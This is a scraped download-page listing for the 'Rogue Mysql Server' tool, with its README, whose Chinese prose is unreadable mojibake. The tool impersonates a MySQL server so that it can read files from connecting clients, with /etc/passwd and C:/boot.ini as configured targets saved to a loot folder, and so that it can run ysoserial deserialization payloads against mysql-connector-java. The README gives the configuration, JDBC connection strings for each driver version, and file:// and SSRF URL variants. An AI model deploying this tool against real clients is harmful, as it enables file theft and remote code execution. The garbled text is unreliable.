文件列表:

LICENSE.txt (1062, 2022-12-02)
Makefile (122, 2022-12-02)
config.yaml (503, 2022-12-02)
go.mod (562, 2022-12-02)
go.sum (10245, 2022-12-02)
loot (0, 2022-12-02)
main.go (10490, 2022-12-02)
mysql (0, 2022-12-02)
mysql\auth_server.go (7922, 2022-12-02)
mysql\auth_server_none.go (1948, 2022-12-02)
mysql\auth_server_static.go (10744, 2022-12-02)
mysql\auth_server_static_test.go (9746, 2022-12-02)
mysql\binlog_event.go (10075, 2022-12-02)
mysql\binlog_event_common.go (11318, 2022-12-02)
mysql\binlog_event_common_test.go (12493, 2022-12-02)
mysql\binlog_event_json.go (16107, 2022-12-02)
mysql\binlog_event_json_test.go (6161, 2022-12-02)
mysql\binlog_event_make.go (14126, 2022-12-02)
mysql\binlog_event_make_test.go (11670, 2022-12-02)
mysql\binlog_event_mariadb.go (2606, 2022-12-02)
mysql\binlog_event_mariadb_test.go (12965, 2022-12-02)
mysql\binlog_event_mysql56.go (2917, 2022-12-02)
mysql\binlog_event_mysql56_test.go (5644, 2022-12-02)
mysql\binlog_event_rbr.go (39522, 2022-12-02)
mysql\binlog_event_rbr_test.go (20012, 2022-12-02)
mysql\binlog_event_test.go (1824, 2022-12-02)
mysql\charset.go (3195, 2022-12-02)
mysql\client.go (23620, 2022-12-02)
mysql\client_test.go (4442, 2022-12-02)
mysql\conn.go (37933, 2022-12-02)
mysql\conn_params.go (1986, 2022-12-02)
mysql\conn_test.go (9785, 2022-12-02)
... ...

# Rogue Mysql Server [English README](https://github.com/rmb122/rogue_mysql_server/blob/master/./README_EN.md) https://github.com/vitessio/vitess ° mysql ¨, ””¨ go, php, python, java, ”‘¤è‰¤§èè¨è§ mysql “è––. è…§é—é, èè·è§è¨ | language | library | pass | |----------|--------------------------------|------| | go | github.com/go-sql-driver/mysql | ” | | php | mysqli, pdo | ” | | python | pymysql | ” | | java | mysql-connector-java | ” | | native | 10.4.13-MariaDB | ” | 觉—”¨– ”è… ## è * …¤§ mysql · * è–è– * 訖 * 蔨—, 鉷éè * è–· ConnAttr, 腷餖 * mysql-connector-java, ¨§é“…”¨—–èè RCE ## ”¨ ¨“‰”é…–¨‰, ·‰é…–è·èè ```sh ./rogue_mysql_server -generate ``` èè¨, ”¨” config.yaml ```sh ./rogue_mysql_server ``` –è…‰¨é…è· ```sh ./rogue_mysql_server -config other_config.yaml ``` ## é…– ¤: ```yaml host: 0.0.0.0 port: 3306 # ‘ IP ’. version_string: "10.4.13-MariaDB-log" # ·—°‰. file_list: ["/etc/passwd", "C:/boot.ini"] save_path: ./loot # éèè––, ¨è‘§è–—訉‰– (¤·°”觓). # è·‰§èè, ‰…§—è¨éè––, ° `save_path` –¤. always_read: true # true, é·è°è·±” LOAD DATA LOCAL, é°èè––, ·è°è–, é…·è·±. from_database_name: false # true, °·è°“§°–èè––. # é“ `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`. # °·è– `/etc/hosts` èé `file_list` è. max_file_size: 0 # è––¤§¤§° ( byte), è…è褧°–…°è. <= 0, 訉é. auth: false users: - root: root - root: password # ”éè, `false`, éè“–è…è“…é. # `true`, éè·é…éè·. jdbc_exploit: false always_exploit: false ysoserial_command: cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4'] cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7'] # è§ `jdbc ”¨…` è ``` ## mysql-connector-java —–”¨… ¨‰ >= 8.0.20, >= 5.1.49 , ¤·è¤, https://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a8659***f***ee5b35b1b https://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f7***d506f2 mysql-connector-java —–”¨…é… ```yaml jdbc_exploit: false always_exploit: false ysoserial_command: cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4'] cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7'] ``` `jdbc_exploit` è¨èè, ¨°· mysql-connector-j …訔¨. ”¨’è––è—é, ”¨è—è–·–. `always_exploit` 訷 mysql-connector-java, ”¨. `ysoserial_command` ”—– payload ‘¤. ”¨è `connectionAttributes` é‰éé蔨 payload, èé‰é豧. ¨è–豧 `t` ‰” payload. , é褔¨‰‰ payload . , ”¨è°¤é…: ¨ 8.x ‰è”¨ cc7, è `jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password` ¤–é訔 `com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor` ”¨–, èè¨: | version | jdbc connection string | |----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | 8.x | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password | | 6.x | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password | | >=5.1.11 | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password | ¤–éèè–, mysql-connector-java ””¨ `file://` — (“…–è, http SSRF ), éè¨ `allowLoadLocalInfile` true ¤–, 餖 `allowUrlInLocalInfile` true, è…è§[èé](https://github.com/rmb122/rogue_mysql_server/blob/master/https://github.com/mysql/mysql-connector-j/blob/dd61577595edad45c3***af508cf91ad26fc4144f/src/main/protocol-impl/java/com/mysql/cj/protocol/a/NativeProtocol.java#L1877) E.g. * — `/` , `jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true` * SSRF `http://127.0.0.1:25565`, `jdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfile=true&allowUrlInLocalInfile=true` ## Ref mysql-connector-java ”¨: https://github.com/fnmsd/MySQL_Fake_Server mysql è…: https://github.com/mysql/mysql-connector-j https://github.com/vitessio/vitess https://github.com/src-d/go-mysql-server http://scz.617.cn:8/network/202001101612.txt

近期下载者：

相关文件：

评论：[我要评论] [举报此文件]

收藏者：